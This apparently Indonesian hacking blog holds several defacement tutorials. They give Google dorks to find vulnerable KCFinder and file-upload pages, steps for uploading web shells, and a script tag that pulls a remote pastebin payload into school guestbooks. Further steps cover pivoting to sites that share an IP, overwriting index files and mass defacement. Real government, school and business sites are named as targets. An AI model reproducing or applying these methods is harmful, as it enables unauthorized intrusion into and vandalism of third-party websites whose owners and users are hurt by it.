Sabtu, 27 April 2019

Cara upload shell dengan metode kcfinder

  /     /   Tidak ada komentar   
HAI SEMUANYA :D ;V

GW BALIK LAGI NEH SETELAH SEKIAN LAMA ;D

KALI INI GW BAKALAN AJARIN DEFACE LAGI DENGAN METODE
KCFINDER :)





OK BAHAN YANG DI PERLUKAN :

-PC/ANDROID
-KONEKSI INTERNET DAN BROWSER
-DORK :
*inurl:/asset/kcfinder
*sites/all/modules/civicrm/packages/kcfinder
*inurl:templates/_editor/kcfinder/
*inurl:includes/kcfinder/browse.php
*inurl:/kcfinder/browse.php
*lib/kcfinder/files/upload 
*admin/kcfinder/files/upload
*panel/kcfinder/upload/files
*editor/kcfinder/upload
*Kcfinder/upload/files
*inurl:/panel/kcfinder/ ext:png
-CSRF [LINK DOWNLOAD]

-SHELL [LINK DOWNLOAD]

OK IKUTI LANGKAH SAYA YAA :)

1.DORKING DI GOOGLE.





2.PILIH TARGET LALU BUKA LINK TARGET.





3.TAMBAHKAN upload.php DI BELAKANG kcfinder/.






4.JIKA VULN MAKA AKAN MUNCUL Unknown Error.





5.MASUKAN LINKNYA KE CSRF.

6. BUKA CSRFNYA.

7.KLIK CHOOSE FILE.





8.PILIH SHELL YANG SUDAH KALIAN DOWNLOAD TADI.






9.KLIK UPLOAD.






10.JIKA BERHASIL DI UPLOAD MAKA AKAN MUNCUL PESAN KOSONG.






CARA MENGAKSES FILE SHELLNYA ADALAH : kcfinder/upload/files/wqe.php5 [wqe.php5 ADALAH NAMA SHELL SAYA].






TADAAAA SAYA TELAH BERHASIL MENGUPLOAD SHELL :D

SAYA RASA SEKIAN TUTORIAL KALI INI :D SAMPAI JUMPA DI TUTORIAL BERIKUTNYA YA BRO :D

Cara deface banyak situs menggunakan metode FAKE ROOT

  /     /   Tidak ada komentar   
Bahan-bahan yang di perlukan :

-Pc/Laptop
-Koneksi Internet
-Web yang sudah di tanami shell dan sudah di tebas indexnya 

1.Kita harus mereverse ip dari web yang sudah kita tanami shell.Reverse ip itu apa min..Reverse ip adalah cara untuk melihat situs-situs yang memiliki 1 ip atau dengan kata lain ipnya sama. klik link ini untuk reverse ip. Masukan link web yg sudah tertanam shell di kolom yang saya beri kotak merah pada gambar di bawah ini. (JANGAN MENGGUNAKAN HTTP/HTTPS DI DEPAN LINK).





2.Setelah memasukan linknya klik GO lalu akan terlihat list situs yang memiliki ip yang sama .





3.Sekarang akses shell yang sudah kalian tanam shell dan sudah kalian tebas indexnya tadi.





4.Copy tulisan yang ada di sebelah public_html beserta simbol / kiri dan kanan.





5.Buka tab baru lalu pastekan di url bar dan tambahkan simbol ~ setelah / pertama (PERHATIKAN GAMBAR DI BAWAH)






6.Sekarang saatnya kita melakukan FAKE ROOT :D, pilih target dari list situs yang kita dapat dari reverse ip tadi, lalu pastekan di depan simbol / (PERHATIKAN GAMBAR DIBAWAH INI).





7.Setelah itu klik enter, Dan KKAAABOOOM kalian telah berhasil melakukan FAKE ROOT :D





Saya rasa sekian tutorial kali ini :) kalian bisa mencoba fake root menggunakan semua situs yang di dapat dari reverse ip :)

Semoga tutorial ini bermanfaat yaa :D

Klo deface gw titip nick yaa :D W3LL

Cara DEFACE web sekolah menggunakan metode JSO

  /     /   Tidak ada komentar   
Kali ini saya akan mengajarkan cara deface website sekolah menggunakan metode JSO

Ok mari kita langsung saja ketutorialnya :)





Bahan-nahan yang di perlukan :

-.Pc/Laptop
-.Koneksi internet
-.Sript JSO : <script type="text/javascript" src="https://pastebin.com/raw/UeU73MLZ"></script>
-.Dork: inurl:/bukutamu.html site:sch.id

1.Masukan dork di Google





2.Pilih target kalian






3.Jika kalian ingin mengetahiu vuln atau tidak bisa di lihat dari capthanya :)






4.Isi kolom nama dan email terserah kalian asal juga gpp :D, yang harus di perhatikan adalah kolom Pesan Anda,di kolom tersebut masukan script JSOnya.





5.Sekarang lanjut isikan capthanya dan klik Send a Messages.





VOOOILAA SITUSNYA AKAN REDIRECT SENDRIRI KE SCRIPT DEFACE KALIAN (JSO) :D


Saya rasa cukup sampai disini saja tutor saya kali ini :)

Cara mudah hack situs pemerintahan

  /     /   Tidak ada komentar   
Maaf blakangan ini saya sudah jarang buat tutor karena saya sibuk bnget :(

Tapi jngan sedih kali ini saya akan mengajarkan tutorial deface yang ckup menarik yaitu tutorial deface situs pemerintahan ! :D






Tanpa basa-basi lagi mari kita langsung saja ke tutorialnya :)

Bahan-bahan yang di butuhkan :

-Pc/Laptop
-Koneksi internet dan browser
-Script deface
-Dork :
 Allowed file types: png gif jpg txt. site:go,id
 Allowed file types: png gif jpg txt. site:go.th
 Allowed file types: png gif jpg txt. site:gov

1.Masukan dork di google :)




2.Pilih website yang ingin kalian jadikan target, trget saya kali ini adalah  https://www.nlrb.gov/




3.Jika web yang kalian pilih itu vuln berarti akan muncul tombol upload seperti gambar dibawah ini




4.Setelah itu klik tombol Choose File untuk memilih file script deface kalian.




5.Setelah form upload muncul pilihlah file deface kalian lalu klik open.




6.Tunggu hingga proses upload selesai dan jika file telah berhasil terupload maka akan ada tombol remove seperti pada gambar dibawah ini.




7.Sekarang saatnya kita untuk mengaksses hasil deface kita :D dengan cara mengklik nama file yang kita upload (PERHATIKAN GAMBAR).




DAAAAN KABOOOM KITA BERHASIL MENDEFACE SITUS PEMERNTAH :D

Saya rasa sekin tutorial dari saya kali ini :D semoga bermanfaat ya :)

Cara deface website orang lain secara permanen [Tebas index]

  /     /   1 komentar   
Di turorial kali ini saya masih akan tetap membahas cara deface website (karena itu hobi saya :v) tapi di tutorial kali ini tidak biasa karena saya akan mengajarkan cara menebas index dari sebuah website,entah itu index home pagenya atau index adminnya atau index yang lainnya :D :V. Tapi ingat saya tidak bertanggung jawab atas apa yang kalian lakukan dan jangan lupa untuk membackup file index.php sebelum menebasnya.




Ok tanpa basa-basi lagi mari kita langsung saja ketutorialnya. :D

1.Bahan yang di butuhkan :


-Pc/Laptop
-Koneksi Internet dan Browser
-Web yang sudah tertanam shell backdoor
-Script Deface
-Ketampanan juga menentukan berhasil atau tidak :V

2.Akseslah shell yang sudah kalian upload sebelumnya :), Jika kalian tidak tau cara mengupload shell maka kalian bisa klik disini untuk mempelajari cara mengupload shellnya.





3.Jika sudah mengakes shell kalian saatnya untuk mencari file yang bernama index.php.





4.Setelah file index.phpnya kalian temukan lalu klik tulisan edit dibagian kanan (Perhatikan gambar dibawah ini).





5.Jika sudah mengklik edit maka akan muncul tampilan seperti gambar dibawah ini.





6.Block semua tulisan yang ada di box tersebut lalu pastekan script deface kalian di box itu.





7.Setelah mempastekan Script deface kalian lalu klik SAVE.


8.Jika sudah muncul tulisan File Saved! seperti gambar dibawah ini itu berarti kita berhasil mengedit file indexnya :D





9.Saatnya kita mengakses link yang sudah kita deface.karena disini target saya adalah unitedtaxiapp.com dan yang saya ingin rubah file indexnya adalah upload maka saya masukan link unitedtaxiapp.com/upload lalu klik enter maka KAAABOOM kita telah mendeface tampilan dari tab upload tersebut :D





Saya rasa sekian tutorial kali ini :D sampai berumpa ditutorial berikutnya yaaa :)

Cara deface banyak website sekaligus dengan satu klik

  /     /   Tidak ada komentar   
Ditutorial kali ini saya akan membagikan cara mendeface banyak website sekaligus :D kedengarannya sangat WOW kan bro :v :D tanpa basa-basi lagi mari kita langsung ke tutorialnya saja :)




1.Bahan-bahan yang di butuhkan :

-Pc/Laptop
-Koneksi Internet dan browser
-Website yang sudah kalian tanami shell
-Script deface
-Mandi dulu sana kalau belum mandi :V :D


2.Akses shell yang telah kalian tanam sebelumnya.






3.Setelah berhasil mengakses shell kalian pilihlah Mass Deface (perhatikan gambar dibawah).






4.Ketika tampilan mass defacenya sudah muncul pastekan script deface kalian di kotak dialog (Perhatikan gambar dibawah).






5.Setelah mempastekan script deface kalia klik Mass Deface.






6.Jika berhasil maka akan muncul tampilan seperti gambar dibawah ini.






7.Saat sudah muncul tampilan di atas sekarang tinggal kita mengakses linknya dan TADAAA kita berhasil mendeface bnyak website sekaligus. :D






Sekian tutorial dari saya kali ini yaa bro sampai bertemu lagi ditutorial berikutnya :D